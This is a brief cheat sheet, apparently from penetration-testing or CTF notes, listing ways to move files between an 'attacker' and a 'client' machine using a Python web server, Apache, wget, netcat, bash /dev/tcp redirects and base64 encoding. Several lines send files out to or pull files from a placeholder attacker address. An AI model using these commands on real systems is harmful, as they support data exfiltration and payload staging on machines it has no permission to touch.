# attacker send
python -m SimpleHTTPServer
# client receive
wget <ip>:8000/filename
# attacker send
cp file.txt /var/www/html
service apache2 start
# client receive
wget http://<ip>/file
# attacker receive
nc -lvnp 4444 > file
# client send
nc <rhost> 4444 < file
# file upload
bash -c 'cat $LFILE > /dev/tcp/<your_ip>/4444'
# file download
bash -c 'cat < /dev/tcp/<your_ip>/4444 > file.txt'
To send the executable file to your machine
# decode content of file
base64 file
# copy the output and recreate
base64 -d executable.txt > file